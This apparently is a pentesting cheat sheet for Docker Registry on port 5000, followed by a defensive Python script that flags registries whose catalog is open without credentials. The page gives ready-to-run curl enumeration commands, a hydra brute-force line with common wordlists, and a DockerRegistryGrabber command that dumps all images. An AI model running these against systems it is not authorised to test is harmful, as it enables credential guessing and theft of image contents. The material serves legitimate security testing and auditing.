Port 5000/Docker Registry
Introduction
A Docker registry is a repository for Docker images. Docker images are essentially snapshots of a Docker container, which is a lightweight, standalone, executable package that includes everything needed to run a piece of software, including the code, runtime, libraries, and dependencies.
A Docker registry stores these images, allowing users to push and pull images to and from it. This enables teams to share and distribute their Docker images easily.
Default port: 5000
PORT     STATE SERVICE VERSION
5000/tcp open  http    Docker Registry (API: 2.0)
Pentesting Docker Registry
Discover
/v2/
/v2/_catalog
Enumeration
curl -s http://IP:5000/v2/_catalog
Authentication
Docker registry may also be configured to require authentication:
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}
BruteForce Docker Registry
hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt IP -s 5000 https-get /v2/
DockerRegistryGrabber
With access to the Docker registry, the DockerRegistryGrabber tool (https://github.com/Syzik/DockerRegistryGrabber) can dump all files from the registry.
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header]
              [--list | --dump_all | --dump DOCKERNAME]
              url
drg.py: error: the following arguments are required: url
python3 drg.py https://IP-URL -U 'USERNAME' -P 'PASSWORD' --dump_all
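For registry owners, the two /v2/_catalog responses shown in the Authentication section can be turned into an audit check that flags registries whose catalog is readable without credentials. This is an added example, not code from the original page or from DockerRegistryGrabber; the function names, the registry host names and the HTTP status codes attached to the sample bodies are assumptions.

```python
import json

# Constructed samples: the bodies are the two responses shown in the
# Authentication section; the HTTP status codes (401, 200) are assumed.
SAMPLE_AUTH = (401, '{"errors":[{"code":"UNAUTHORIZED","message":"authentication required",'
                    '"detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}')
SAMPLE_OPEN = (200, '{"repositories":["alpine","ubuntu"]}')


def classify_catalog(status, body):
    """Classify an unauthenticated GET /v2/_catalog response.

    Returns (verdict, repositories); verdict is "auth-required",
    "anonymous-catalog" or "unknown" (not an answer we recognise).
    """
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        doc = None  # e.g. an HTML error page from a proxy in front of the registry
    if not isinstance(doc, dict):
        doc = {}
    errors = doc.get("errors")
    codes = set()
    if isinstance(errors, list):
        codes = {e["code"] for e in errors
                 if isinstance(e, dict) and isinstance(e.get("code"), str)}
    if status in (401, 403) or codes & {"UNAUTHORIZED", "DENIED"}:
        return ("auth-required", [])
    repos = doc.get("repositories")
    if status == 200 and isinstance(repos, list):
        return ("anonymous-catalog", repos)
    return ("unknown", [])


def audit(results):
    """results maps a registry name to (status, body); returns one finding per open catalog."""
    findings = []
    for name, (status, body) in sorted(results.items()):
        verdict, repos = classify_catalog(status, body)
        if verdict == "anonymous-catalog":
            findings.append(f"{name}: catalog readable without credentials "
                            f"({len(repos)} repositories)")
    return findings


if __name__ == "__main__":
    # Hypothetical inventory of two internal registries, fed with the constructed samples.
    for line in audit({"registry-a.example": SAMPLE_AUTH, "registry-b.example": SAMPLE_OPEN}):
        print(line)
```

Feed it the status and body collected from each registry in your own inventory; an "unknown" verdict means the endpoint did not answer like a registry and should be checked by hand.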